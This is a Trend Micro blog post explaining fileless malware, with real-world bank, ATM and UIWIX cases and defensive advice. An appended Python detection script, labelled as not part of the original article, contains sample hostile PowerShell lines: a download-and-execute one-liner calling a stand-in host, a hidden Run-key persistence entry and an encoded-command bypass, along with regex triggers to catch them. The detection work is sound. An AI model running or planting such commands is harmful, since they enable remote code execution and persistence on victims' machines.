Fileless Malware: A Hidden Threat

Credit to Author: Trend Micro| Date: Mon, 23 Oct 2017 21:09:03 +0000

Fileless malware is a hidden threat that should concern businesses.

Malware is advancing at an unprecedented rate, with four new strains discovered every minute, Slate reported. That is already a lot for businesses to worry about, and it doesn't even cover the threats that haven't yet been detected. Many attackers have evolved their techniques to evade common security solutions in order to cause the most damage to an infected machine and get away with more information.

Legacy security solutions are already struggling to keep up with conventional malware, and sophisticated fileless malware poses an even greater risk to companies. Fileless malware has recently been used to bypass traditional file-scanning technology and lie undetected within infected machines. Although this type of strain may not get as much coverage as flashier strains, fileless malware is a hidden threat that should concern businesses.

What is fileless malware?

Legitimate operating systems and applications have a number of distinct vulnerabilities that attackers can exploit to infect machines and get away with sensitive information. These gaps often aren't known until damage has already been done – then it's a race against time to patch the openings and prevent similar incidents. A fileless malware infection is one of the many techniques used to take advantage of process vulnerabilities – i.e., making the browser run malicious code, leveraging Microsoft Word macros or using Microsoft's PowerShell utility – but it is uniquely geared to fly under the radar. Fileless malware is written directly into a computer's RAM through carefully crafted PowerShell scripts. According to TechRepublic contributor Jesus Vigo, once access is granted, PowerShell executes a hidden command against the system, which varies based on the attacker's intentions and the length of time planned for the breach.

Fileless malware is written into code, making it hard to detect.

One positive is that attackers don't know how long they will have to carry out the attack, since the system could be restarted at any time, halting the breach. However, threat actors have already made preparations for these situations to ensure that fileless malware doesn't rely on the endpoint staying up to sustain connectivity. Attackers plant registry entries and set scripts to run even after the system restarts, ensuring that the attack can continue. These capabilities pose a real threat to businesses that aren't prepared for this level of sophistication.

Current security solutions detect an intrusion using a signature derived from the malware file's characteristics. However, because fileless malware doesn't drop a payload file to infect a system, security applications don't know what to look for. In addition, this threat uses the system's own commands to execute the attack, which might not be accounted for in traffic and behavior monitoring efforts.

"These situations demonstrate how dangerous fileless malware is."

Examples of executed attacks

A number of big exploits have already been executed through fileless malware infections. These situations not only demonstrate how dangerous fileless malware is, but also provide lessons on what organizations should look for.

Banks lose to fileless attacks

Earlier this year, more than 100 banks and financial institutions were infected by a fileless malware attack, impacting organizations in over 40 countries. The Hacker News noted that this type of technique was never mainstream, until now, making it difficult for businesses to respond appropriately to the new threat. One bank's security team discovered the malware when they found a copy of Meterpreter in the physical memory of a Microsoft domain controller. This attack likely used PowerShell to load Meterpreter into memory rather than writing it to the disk, aiming to compromise computers that control ATMs. 

While the malware may have been stalled when it was initially discovered in February, a few months later, hackers had the last laugh. The Hacker News reported that at least eight ATMs in Russia were targeted by fileless malware, enabling the hackers to control the machines and steal $800,000. The affected banks couldn't find any trace of malware on the ATMs or backend network. Instead, it was discovered that two files of malware logs were on the ATM's hard drive. The malware was believed to have been installed and executed via remote administration modules.


UIWIX takes a page from WannaCry

Shortly after WannaCry impacted thousands of businesses, other strains evolved to emulate its techniques. UIWIX ransomware uses the same vulnerabilities that WannaCry exploited, but UIWIX is fileless. According to a Trend Micro report, UIWIX opts to terminate itself if it detects a virtual machine or sandbox, allowing the strain to avoid detection and analysis. This strain is much more difficult to stop and remove from infected systems, and uses two algorithms for encryption.

Fortunately, there is a means to stop this malware from impacting your system. After WannaCry hit, critical patches were rolled out to eliminate this vulnerability. By updating systems with the necessary patches, organizations will be able to mitigate UIWIX and similar threats that exploit this security gap in the future. Even though it might take time to execute the changes, it's worth it to ensure your systems stay protected.

Detecting invisible risks

Navigating the changing threat landscape and tackling a sophisticated strain like fileless malware can be a daunting prospect for many organizations. However, there are a few things that leaders can do to protect themselves against invisible risks and better detect these evasive techniques. Trend Micro recommends applying the latest patches, implementing the principle of least privilege and enabling a custom sandbox. Organizations should also adopt best practices for securing and using PowerShell so that suspicious or malicious behaviors within a system can be scrutinized. IT departments should also consider defining detection triggers based on the commands found in malicious PowerShell scripts. Monitoring behavior, securing possible points of entry and disabling unnecessary components will be essential for preventing fileless malware infections as well.
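As an added, illustrative example (not code from the original article or from Trend Micro), the following Python script applies the kind of command-based detection triggers this section describes, including the registry persistence mentioned earlier, to a handful of constructed PowerShell script-block log records. The log format, trigger names, patterns and weights are assumptions made for the illustration.

```python
import re

# Constructed sample records in a simplified "host= user= script=" format; they are
# illustrative stand-ins for PowerShell script-block log entries, not real telemetry.
SAMPLE_LOGS = [
    "host=dc01 user=svc_backup script=Get-ChildItem C:\\Backups | Measure-Object",
    "host=ws17 user=jdoe script=powershell -NoProfile -ExecutionPolicy Bypass "
    "-EncodedCommand ZQBjAGgAbwA=",
    "host=ws22 user=mlee script=IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage')",
    "host=ws22 user=mlee script=Set-ItemProperty -Path HKCU:\\Software\\Microsoft"
    "\\Windows\\CurrentVersion\\Run -Name upd -Value 'powershell -w hidden -enc ...'",
    "host=ws09 user=admin script=Get-Service | Where-Object Status -eq Running",
]

# Assumed trigger set: (name, pattern, weight). Weights let a single low-signal flag that
# legitimate admin scripts also use (e.g. -ExecutionPolicy Bypass) pass on its own,
# while combinations of in-memory execution, encoding and persistence raise an alert.
TRIGGERS = [
    ("encoded_command", r"-(e|ec|enc|encodedcommand)\s+\S+", 2),
    ("execution_policy_bypass", r"-ex(ecutionpolicy)?\s+bypass\b", 1),
    ("hidden_window", r"-w(indowstyle)?\s+hidden\b", 1),
    ("invoke_expression", r"\b(iex|invoke-expression)\b", 1),
    ("in_memory_download", r"\b(downloadstring|downloadfile|net\.webclient|invoke-webrequest)\b", 2),
    ("run_key_persistence", r"currentversion\\run\b", 2),  # survives a reboot via the Run key
]
ALERT_THRESHOLD = 2

RECORD_RE = re.compile(r"host=(\S+)\s+user=(\S+)\s+script=(.*)", re.DOTALL)


def analyze(record):
    """Return host, user, matched trigger names, weighted score and flagged verdict."""
    m = RECORD_RE.match(record)
    if not m:
        raise ValueError("unrecognised record format: %r" % record)
    host, user, script = m.groups()
    hits = [name for name, pat, _ in TRIGGERS if re.search(pat, script, re.IGNORECASE)]
    score = sum(w for name, _, w in TRIGGERS if name in hits)
    return {"host": host, "user": user, "triggers": hits,
            "score": score, "flagged": score >= ALERT_THRESHOLD}


def scan(records):
    """Return the analysis of every record whose score reaches the alert threshold."""
    return [r for r in map(analyze, records) if r["flagged"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print("%s %s score=%d %s" % (hit["host"], hit["user"], hit["score"], hit["triggers"]))
```

In the constructed sample the backup job and the service query pass untouched, while the encoded command, the download-and-execute one-liner and the Run-key persistence entry are flagged.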

Fileless malware reminds us of the direction that cyber threats are heading, the rising sophistication of emerging strains and how businesses are unprepared to handle these risks. Awareness around this technique can help leaders understand what to look for and how to keep themselves safe. For more information on fileless malware and how to protect your business, contact Trend Micro today.

http://feeds.trendmicro.com/TrendMicroSimplySecurity